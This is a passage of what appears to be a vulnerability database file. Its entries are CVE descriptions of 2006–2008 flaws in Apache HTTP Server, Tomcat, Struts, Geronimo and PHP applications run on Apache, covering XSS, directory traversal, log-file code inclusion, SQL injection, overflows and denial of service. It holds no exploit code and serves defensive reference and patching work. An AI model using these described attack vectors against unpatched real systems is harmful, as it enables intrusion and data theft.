5805| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
5806| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
5807| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
5808| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
5809| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
5810| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
5811| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
5812| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
5813| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
5814| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
5815| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
5816| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
5817| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
5818| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
5819| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
5820| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5821| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5822| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
5823| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
5824| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
5825| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
5826| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
5827| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
5828| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
5829| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
5830| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
5831| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
5832| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5833| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5834| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
5835| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
5836| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
5837| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5838| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
5839| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
5840| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
5841| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
5842| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
5843| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
5844| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
5845| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
5846| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5847| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
5848| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
5849| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
5850| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
5851| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
5852| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
5853| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
5854| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
5855| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
5856| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
5857| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
5858| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
5859| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
5860| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
5861| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
5862| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
5863| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
5864| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
5865| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
5866| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
5867| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
5868| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
5869| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
5870| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
5871| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
5872| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
5873| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
5874| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5875| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5876| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5877| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5878| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
5879| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5880| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5881| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5882| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5883| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5884| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5885| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5886| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5887| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5888| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5889| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5890| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5891| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5892| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5893| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5894| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5895| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5896| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5897| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5898| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5899| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5900| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5901| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5902| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5903| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
5904| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5905| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5906| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5907| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5908| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5909| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5910| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5911| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5912| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5913| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5914| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5915| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5916| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
